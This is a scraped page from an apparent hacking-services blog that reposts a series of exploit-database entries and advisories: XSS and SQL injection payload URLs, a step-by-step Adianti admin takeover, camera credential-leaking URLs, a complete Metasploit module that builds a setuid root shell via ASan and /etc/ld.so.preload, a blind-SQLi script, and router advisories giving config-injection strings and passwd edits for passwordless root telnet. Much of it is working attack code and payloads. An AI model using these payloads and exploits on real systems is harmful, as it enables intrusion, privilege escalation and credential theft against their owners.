source: https://www.securityfocus.com/bid/54117/info
Adiscan LogAnalyzer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
LogAnalyzer 3.4.3 is vulnerable; other versions may also be vulnerable.
http://www.example.com/?search=Search&highlight="<script>alert(document.cookie)</script>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
86387699
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/54023/info
ADICO is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ADICO 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/car-rent/[PATH]/admin/index.php?job=cars&action=edit&id=[SQL INJECTION]
http://www.example.com/car-rent/[PATH]/admin/index.php?job=calendar&action=month&id=[SQL INJECTION]
# Exploit Title: [SQL Injection in Adianti Framework]
# Date: [2018-12-18]
# Exploit Author: [Joner de Mello Assolin]
# Vendor Homepage: [https://www.adianti.com.br]
# Version: [5.5.0 and 5.6.0] (REQUIRED)
# Tested on: [XAMPP Version 7.2.2, phpMyAdmin 4.7.7 and 4.8.4, PHP 7.1 , Apache/2.4.29 (Win32) , libmysql - mysqlnd 5.0.12-dev – 20150407 and MariaDB 10.1]
# Software Link: [https://www.adianti.com.br/download-center?app=template]
The failure allows any ordinary user to enter SQL Injection and take over the administrator account or any other user of the system,
by editing the profile itself.
POC:
1-Register an ordinary user or use the framework standard(user=user password=user)
2- Access the user profile and click edit http://localhost/template/index.php?class=SystemProfileForm&method=onEdit
3- In the field name enter SQL injection and click Save:
(SELECT 'hackeado'),login=(SELECT 'anonymous'),password=(SELECT '294de3557d9d00b3d2d8a1e6aab028cf'),email=(SELECT 'anonymous@anonymous.com')WHERE `id`=1#
4-Go to the login screen and enter username and password: Now you can log in as administrator!.
USER: anonymous
PASSWORD: anonymous
1. Adivisory Information
Title: ADH-Web Server IP-Cameras Improper Access Restrictions
EDB-ID: 38245
Advisory ID: OLSA-2015-0919
Advisory URL: http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html
Date published: 2015-09-19
Date of last update: 2016-02-15
Vendors contacted: Dedicated Micros
2. Vulnerability Information
Class: Information Exposure [CWE-200]
Impact: Access Control Bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: N/A
3. Vulnerability Description
Due to improper access restriction the ADH-Web device [1] allows a remote attacker to browse and access arbitrary files from the following directorie '/hdd0/logs'. You can also get numerous information (important for a fingerprint step) via the parameter variable in variable.cgi script [2].
Background:
Dedicated Micros’ ground breaking Closed IPTV solution makes deploying an IP Video, CCTV system safe, secure and simple. Combining patent-pending innovation with zeroconf networking technology, Closed IPTV automatically allocates IP addresses to IP cameras by physical port. In this way the system is completely deterministic, creating firewalls and monitoring IP connections by individual network ports so they cannot be hacked or intercepted. This ground breaking solution provides a very simple and secure answer to IP Video, meaning that no prior knowledge of IP networking is required. Sophisticated and Dependable network security can be achieved with a single click.
4. Vulnerable Packages
- SD Advanced Closed IPTV
- SD Advanced
- EcoSense
- Digital Sprite 2
5. Technical Description
[1] Usually this directory can be protected against unauthenticated access (401 Unauthorized), though, it can access all files directly without requiring authentication.As in the statement below:
(401): http://<target_ip>/hdd0/logs
(200): http://<target_ip>/hdd0/logs/log.txt
> Most common logfiles:
arc_log.txt
bak.txt
connect.txt
log.txt
seclog.log
startup.txt
DBGLOG.TXT
access.txt
security.txt
[2] Another problem identified is an information exposure via the parameter variable in variable.cgi script. Knowing some variables can extract a reasonable amount of information:
> DNS:
http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0
> ftp master ftp console credentials:
http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
(although the vast majority of servers have ftp/telnet with anonymous access allowed.)
> alms
http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0
> camconfig
http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1
(includes, but is not limited to)
This servers also sends credentials (and other sensitive data) via GET parameters, this is poor practice as the URL is liable to be logged in any number of places between the customer and the camera. The credentials should be passed in the body of a POST request (under SSL of course, here is not the case). . (Is possible to create, edit and delete users and other configurations in this way, very dangerous CSRF vectors).
6. Vendor Information, Solutions and Workarounds
The vendor found that some things are not vulnerabilities (sensitive information via GET, for example) and others are useless (hardcoded credentials) and others are not yet so critical (access to server logs). I think that at least this information can assist during an intrusion test, as will be shown soon.
7. Credits
These vulnerabilities has been discovered by Orwelllabs.
8. Report Timeline
2015-08-31: Vendor has been notified about the vulnerabilities (without details yet).
2015-09-01: Vendor acknowledges the receipt of the email and asks for technical details.
2015-09-01: A email with technical details is sent to vendor.
2015-09-11: Still no response, another email was sent to the Vendor requesting any opinion on the reported problems.
2015-09-11: The vendor reported that the matter was passed on to the team developed and that it would contact me the following week (2015-09-14).
2015-09-14: The development team responded by passing its consideration of the points andreported in accordance with this response the impact of these vulnerabilities is low and are no longer available unauthenticated using recent software release (version 10212).
Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this information.
About Orwelllabs
++++++++++++++++
Orwelllabs is a security research lab interested in embedded device & webapp hacking.
We aims to create some intelligence around this vast and confusing picture that is the Internet of things.
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'AddressSanitizer (ASan) SUID Executable Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Linux systems using
setuid executables compiled with AddressSanitizer (ASan).
ASan configuration related environment variables are permitted when
executing setuid executables built with libasan. The `log_path` option
can be set using the `ASAN_OPTIONS` environment variable, allowing
clobbering of arbitrary files, with the privileges of the setuid user.
This module uploads a shared object and sprays symlinks to overwrite
`/etc/ld.so.preload` in order to create a setuid root shell.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Szabolcs Nagy', # Discovery and PoC
'infodox', # unsanitary.sh Exploit
'bcoles' # Metasploit
],
'DisclosureDate' => '2016-02-17',
'Platform' => 'linux',
'Arch' =>
[
ARCH_X86,
ARCH_X64,
ARCH_ARMLE,
ARCH_AARCH64,
ARCH_PPC,
ARCH_MIPSLE,
ARCH_MIPSBE
],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [['Auto', {}]],
'DefaultOptions' =>
{
'AppendExit' => true,
'PrependSetresuid' => true,
'PrependSetresgid' => true,
'PrependFork' => true
},
'References' =>
[
['URL', 'https://seclists.org/oss-sec/2016/q1/363'],
['URL', 'https://seclists.org/oss-sec/2016/q1/379'],
['URL', 'https://gist.github.com/0x27/9ff2c8fb445b6ab9c94e'],
['URL', 'https://github.com/bcoles/local-exploits/tree/master/asan-suid-root']
],
'Notes' =>
{
'AKA' => ['unsanitary.sh']
},
'DefaultTarget' => 0))
register_options [
OptString.new('SUID_EXECUTABLE', [true, 'Path to a SUID executable compiled with ASan', '']),
OptInt.new('SPRAY_SIZE', [true, 'Number of PID symlinks to create', 50])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def base_dir
datastore['WritableDir']
end
def suid_exe_path
datastore['SUID_EXECUTABLE']
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
chmod path
end
def upload_and_compile(path, data, gcc_args='')
upload "#{path}.c", data
gcc_cmd = "gcc -o #{path} #{path}.c"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
unless gcc_args.to_s.blank?
gcc_cmd << " #{gcc_args}"
end
output = cmd_exec gcc_cmd
unless output.blank?
print_error 'Compiling failed:'
print_line output
end
register_file_for_cleanup path
chmod path
end
def check
unless setuid? suid_exe_path
vprint_error "#{suid_exe_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{suid_exe_path} is setuid"
# Check if the executable was compiled with ASan
#
# If the setuid executable is readable, and `ldd` is installed and in $PATH,
# we can detect ASan via linked libraries. (`objdump` could also be used).
#
# Otherwise, we can try to detect ASan via the help output with the `help=1` option.
# This approach works regardless of whether the setuid executable is readable,
# with the obvious disadvantage that it requires invoking the executable.
if cmd_exec("test -r #{suid_exe_path} && echo true").to_s.include?('true') && command_exists?('ldd')
unless cmd_exec("ldd #{suid_exe_path}").to_s.include? 'libasan.so'
vprint_error "#{suid_exe_path} was not compiled with ASan"
return CheckCode::Safe
end
else
unless cmd_exec("ASAN_OPTIONS=help=1 #{suid_exe_path}").include? 'AddressSanitizer'
vprint_error "#{suid_exe_path} was not compiled with ASan"
return CheckCode::Safe
end
end
vprint_good "#{suid_exe_path} was compiled with ASan"
unless has_gcc?
print_error 'gcc is not installed. Compiling will fail.'
return CheckCode::Safe
end
vprint_good 'gcc is installed'
CheckCode::Appears
end
def exploit
unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
unless writable? pwd.to_s.strip
fail_with Failure::BadConfig, "#{pwd.to_s.strip} working directory is not writable"
end
if nosuid? base_dir
fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
end
@log_prefix = ".#{rand_text_alphanumeric 5..10}"
payload_name = ".#{rand_text_alphanumeric 5..10}"
payload_path = "#{base_dir}/#{payload_name}"
upload_and_chmodx payload_path, generate_payload_exe
rootshell_name = ".#{rand_text_alphanumeric 5..10}"
@rootshell_path = "#{base_dir}/#{rootshell_name}"
rootshell = <<-EOF
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
setuid(0);
setgid(0);
execl("/bin/bash", "bash", NULL);
}
EOF
upload_and_compile @rootshell_path, rootshell, '-Wall'
lib_name = ".#{rand_text_alphanumeric 5..10}"
lib_path = "#{base_dir}/#{lib_name}.so"
lib = <<-EOF
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
void init(void) __attribute__((constructor));
void __attribute__((constructor)) init() {
if (setuid(0) || setgid(0))
_exit(1);
unlink("/etc/ld.so.preload");
chown("#{@rootshell_path}", 0, 0);
chmod("#{@rootshell_path}", 04755);
_exit(0);
}
EOF
upload_and_compile lib_path, lib, '-fPIC -shared -ldl -Wall'
spray_name = ".#{rand_text_alphanumeric 5..10}"
spray_path = "#{base_dir}/#{spray_name}"
spray = <<-EOF
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
pid_t pid = getpid();
char buf[64];
for (int i=0; i<=#{datastore['SPRAY_SIZE']}; i++) {
snprintf(buf, sizeof(buf), "#{@log_prefix}.%ld", (long)pid+i);
symlink("/etc/ld.so.preload", buf);
}
}
EOF
upload_and_compile spray_path, spray, '-Wall'
exp_name = ".#{rand_text_alphanumeric 5..10}"
exp_path = "#{base_dir}/#{exp_name}"
exp = <<-EOF
#!/bin/sh
#{spray_path}
ASAN_OPTIONS="disable_coredump=1 suppressions='/#{@log_prefix}
#{lib_path}
' log_path=./#{@log_prefix} verbosity=0" "#{suid_exe_path}" >/dev/null 2>&1
ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "#{suid_exe_path}" >/dev/null 2>&1
EOF
upload_and_chmodx exp_path, exp
print_status 'Launching exploit...'
output = cmd_exec exp_path
output.each_line { |line| vprint_status line.chomp }
unless setuid? @rootshell_path
fail_with Failure::Unknown, "Failed to set-uid root #{@rootshell_path}"
end
print_good "Success! #{@rootshell_path} is set-uid root!"
vprint_line cmd_exec "ls -la #{@rootshell_path}"
print_status 'Executing payload...'
cmd_exec "echo #{payload_path} | #{@rootshell_path} & echo "
end
def cleanup
# Safety check to ensure we don't delete everything in the working directory
if @log_prefix.to_s.strip.eql? ''
vprint_warning "#{datastore['SPRAY_SIZE']} symlinks may require manual cleanup in: #{pwd}"
else
cmd_exec "rm #{pwd}/#{@log_prefix}*"
end
ensure
super
end
def on_new_session(session)
# Remove rootshell executable
if session.type.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.fs.file.rm @rootshell_path
else
session.shell_command_token "rm -f '#{@rootshell_path}'"
end
ensure
super
end
end
# Title: addressbook 9.0.0.1 - 'id' SQL Injection
# Date: 2020-04-01
# Author: David Velazquez a.k.a. d4sh&r000
# vulnerable application: https://sourceforge.net/projects/php-addressbook/files/latest/download
# vulnerable version: 9.0.0.1
# Discription: addressbook 9.0.0.1 time-based blind SQL injection
# Tested On: Ubuntu Server 20.04 LTS
# Platform: PHP
# Type: webapp
# Use:
# addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1'
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import requests
def isVulnerable(URL):
"""Check if the URL is vulnerable to ime-based blind SQL injection"""
response = requests.get(URL+'%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy')
s=response.elapsed.total_seconds()
if s>5:#I put a sleep sentence to test the bug
sys.stdout.write('[+] Aplication is vulnerable!!!\n')
else:
sys.stdout.write('[+] Aplication NOT vulnerable\n')
if __name__ == "__main__":
isVulnerable(sys.argv[1])
SEC Consult Vulnerability Lab Security Advisory < 20180704-2 >
=======================================================================
title: Privilege escalation via linux group manipulation
product: All ADB Broadband Gateways / Routers
(based on Epicentro platform)
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
fixed version: see "Solution" section below
CVE number: CVE-2018-13110
impact: critical
homepage: http://www.adbglobal.com
found: 2016-07-11
by: Stefan Viehböck (Office Vienna)
Johannes Greil (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."
Source: https://www.adbglobal.com/about-adb/
"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast
Business recommendation:
------------------------
By exploiting the group manipulation vulnerability on affected and unpatched
devices an attacker is able to gain access to the command line interface (CLI)
if previously disabled by the ISP.
Depending on the feature-set of the CLI (ISP dependent) it is then possible to
gain access to the whole configuration and manipulate settings in the web GUI
and escalate privileges to highest access rights.
It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.
Vulnerability overview/description:
-----------------------------------
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
An attacker with standard / low access rights within the web GUI is able to
gain access to the CLI (if it has been previously disabled by the configuration)
and escalate his privileges.
Depending on the CLI features it is possible to extract the whole configuration
and manipulate settings or gain access to debug features of the device, e.g.
via "debug", "upgrade", "upload" etc. commands in the CLI.
Attackers can gain access to sensitive configuration data such as VoIP
credentials or other information and manipulate any settings of the device.
Proof of concept:
-----------------
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
It is possible to manipulate the group name setting of "Storage users" and
overwrite the local linux groups called "remoteaccess" or "localaccess" in
(in /etc/group) which define access to Telnet or SSH on the ADB devices.
It may be possible to overwrite the "root" group as well but it may brick the
device and the default user is already within the "root" group. Hence this
attack has not been further tested.
The following steps describe the attack:
a) Add a new group called "localaccess" via the web GUI here:
http://$IP/ui/dboard/storage/storageusers?backto=storage
This will generate the following new group in /etc/group. The original
"localaccess" group will overwritten.
localaccess:Storage Group:5001:
b) Then delete this group via the web GUI again, the entry will be removed
from /etc/group completely.
c) Afterwards, create the following new group name entry via the web GUI and
add your user account (e.g. admin) which should have access to Telnet/SSH
now:
localaccess:x:20:root,admin,
d) Now the admin user has been added to the "localaccess" group and the "admin"
account is allowed to login via SSH or Telnet. Excerpt of new /etc/group:
localaccess:x:20:root,admin,:Storage Group:5001:
Further attacks on the CLI interface will not be described in detail within
this advisory. It is possible to add new user accounts with highest access rights
("newuser" command) or upload the whole configuration to a remote FTP server
("upload" command). The available feature-set of the CLI depends on the firmware
version.
The XML configuration is encrypted, but can be easily decrypted with access to the
firmware. Then it can be manipulated and uploaded to the device again ("upgrade"
command) which allows privilege escalation by changing permissions or roles
within this file.
Vulnerable / tested versions:
-----------------------------
The following specific devices & firmware have been tested which were the most
recent versions at the time of discovery:
The firmware versions depend on the ISP / customer of ADB and may vary!
ADB P.RG AV4202N - E_3.3.0, firmware version depending on ISP
ADB DV 2210 - E_5.3.0, firmware version depending on ISP
ADB VV 5522 - E_8.3.0, firmware version depending on ISP
ADB VV 2220 - E_9.0.6, firmware version depending on ISP
etc.
It has been confirmed by ADB that _all_ their ADB modems / gateways / routers
based on the Epicentro platform are affected by this vulnerability in all
firmware versions for all their customers (ISPs) at the time of identification
of the vulnerability _except_ those devices which have a custom UI developed
for the ISP.
Vendor contact timeline:
------------------------
2016-07-12: Contacting vendor ADB, sending encrypted advisory, asking about
affected devices
2016-07 - 2017-04: Further coordination, waiting for firmware release,
implementation & rollout phases for their customers
2018-07-04: Embargo lifted, public release of security advisory
Solution:
---------
The firmware versions depend on the ISP / customer of ADB and may vary!
Patch version:
ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP
ADB DV2210 >= E_5.3.2, firmware version depending on ISP
ADB VV5522 >= E_8.3.2, firmware version depending on ISP
ADB VV2220 >= E_9.3.2, firmware version depending on ISP
etc.
Workaround:
-----------
Restrict access to the web interface and only allow trusted users.
Change any default/weak passwords to strong credentials.
Don't allow remote access to the web GUI via Internet.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF J. Greil / @2018
SEC Consult Vulnerability Lab Security Advisory < 20180704-0 >
=======================================================================
title: Local root jailbreak via network file sharing flaw
product: All ADB Broadband Gateways / Routers
(based on Epicentro platform)
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
fixed version: see "Solution" section below
CVE number: CVE-2018-13108
impact: critical
homepage: http://www.adbglobal.com
found: 2016-06-09
by: Johannes Greil (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."
Source: https://www.adbglobal.com/about-adb/
"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast
Business recommendation:
------------------------
By exploiting the local root vulnerability on affected and unpatched devices
an attacker is able to gain full access to the device with highest privileges.
Attackers are able to modify any settings that might have otherwise been
prohibited by the ISP. It is possible to retrieve all stored user credentials
(such as VoIP) or SSL private keys. Furthermore, attacks on the internal network
side of the ISP are possible by using the device as a jump host, depending on
the internal network security measures.
Network security should not depend on the security of independent devices,
such as modems. An attacker with root access to such a device can enable
attacks on connected networks, such as administrative networks managed by the
ISP or other users.
It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.
Vulnerability overview/description:
-----------------------------------
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)
Most ADB devices offer USB ports in order for customers to use them for
printer or file sharing. In the past, ADB devices have suffered from symlink
attacks e.g. via FTP server functionality which has been fixed in more recent
firmware versions.
The "Network File Sharing" feature of current ADB devices via USB uses a samba
daemon which accesses the USB drive with highest access rights and exports the
network shares with root user permissions. The default and hardcoded setting
for the samba daemon within the smb.conf on the device has set "wide links =
no" which normally disallows gaining access to the root file system of the
device using symlink attacks via a USB drive.
But an attacker is able to exploit both a web GUI input validation and samba
configuration file parsing problem which makes it possible to access the root
file system of the device with root access rights via a manipulated USB drive.
The attacker can then edit various system files, e.g. passwd and session
information of the web server in order to escalate web GUI privileges and
start a telnet server and gain full system level shell access as root.
This is a local attack and not possible via remote access vectors as an
attacker needs to insert a specially crafted USB drive into the device!
Usually not even the ISPs themselves have direct root access on ADB devices
hence this attack is quite problematic for further internal attacks.
It is possible to change network routes and attack networks and systems within
the internal network of the ISP or add backdoors or sniffers to the device.
Furthermore, attackers are able to gain access to all stored credentials,
such as PPP, wireless, CPE management or VoIP passwords.
Proof of concept:
-----------------
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)
The samba configuration file (smb.conf) of the ADB devices has set the
following default settings. All file system operations will be performed
by the root user as set in the "force user" / "force group" setting of the
exported share:
[global]
netbios name = HOSTNAME
workgroup = WORKGROUP
wide links = no
smb ports = 445 139
security = share
guest account = root
announce version = 5.0
socket options = TCP_NODELAY SO_RCVBUF=65536 SO_SNDBUF=65536
null passwords = yes
name resolve order = hosts wins bcast
wins support = yes
syslog only = yes
read only = no
hosts allow = 192.168.1.1/255.255.255.0
[share]
path = /mnt/sdb1/.
read only = false
force user = root
force group = root
guest ok = yes
An attacker can edit various values such as "netbios name" and "workgroup" via
the web GUI. The web GUI does some basic filtering and newlines are
unfortunately not allowed (the samba config file is line-based) hence a
special bypass has been crafted in order to change the default setting "wide
links = no" to "wide links = yes". This enables symlinks to the root file
system.
By using the following netbios name and workgroup, samba can be tricked into
allowing symlinks to the root file system of the device:
netbios domain / workgroup = =wide links = yes \ netbios name = wide links = yes
Relevant HTTP POST parameters:
&domainName==wide links = yes \ \ &hostName=wide+links+%3D+yes+%5C
According to the manpage of smb.conf, any line ending in a \ is continued by the
samba parser on the next line. Furthermore, it states that "Only the first
equals sign in a parameter is significant." - which it seems can be bypassed
by adding a backslash \. The parser now thinks that the "wide links = yes" has
been set and omits the hardcoded "wide links = no" which comes further down
below in the smb.conf file.
In order to add those special values within the web GUI a proxy server such as
burp proxy is needed because of basic input validation on the client side (not
server side).
The USB drive needs to be formatted to ext2 or ext3 which is supported by
the ADB device. Then create a symlink to the root file system via the
following command on the attacker's computer:
ln -s / /path/to/usbdevice/rootfs
After those settings have been changed and the USB drive has been set up,
the USB drive can be inserted into the ADB device. The USB volume needs to be
exported (with read/write permissions) as a share via the web GUI. Afterwards
it can be accessed over the network and the "rootfs" folder example from above
will give an attacker access to the ADB root file system with "read & write"
access permissions as root.
Most file systems / partitions on the device are mounted read-only per default,
but the most important one "/tmp" contains all settings and is mounted writable
for operations.
The defaut user "admin" usually has little access rights during normal
operations which can be changed by manipulating the session file of the web
server within /tmp/ui_session_XXX where XXX is the session id of the currently
logged on user, e.g. change:
from: access.dboard/settings/management/telnetserver =|> 2001
to: access.dboard/settings/management/telnetserver =|> 2220
etc. (or change all entries for maximum access level)
This way, an attacker can give himself all/highest access permissions within
the GUI and change all the settings of the device! Hence the telnet or SSH
server can be started even though they might have been disabled by the ISP.
Furthermore, the /tmp/passwd file has to be changed in order to allow root
access via shell/telnet:
change: root:*:0:0:root:/root:/bin/ash
to: root::0:0:root:/root:/bin/ash
Now telnet into the device with root and no password.
Example of an ADB DV2210 device:
Trying $IP...
Connected to $IP.
Escape character is '^]'.
Login root:
BusyBox v1.17.3 (2016-02-11 13:34:33 CET) built-in shell (ash)
Enter 'help' for a list of built-in commands.
___ ___ ___ ___
|\__\ /\ \ /\ \ /\ |:| | /::\ \ /::\ \ /::\ |:| | /:/\:\ \ /:/\:\ \ /:/\:\ |:|__|__ /::\~\:\ \ /::\~\:\ \ _\:\~\:\ /::::\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ /\ \:\ \:\__ /:/~~/~ \/__\:\/:/ / \/__\:\/:/ / \:\ \:\ \/__/
/:/ / \::/ / \::/ / \:\ \:\__ \/__/ /:/ / \/__/ \:\/:/ /
/:/ / \::/ /
\/__/ \/__/
..................................................................
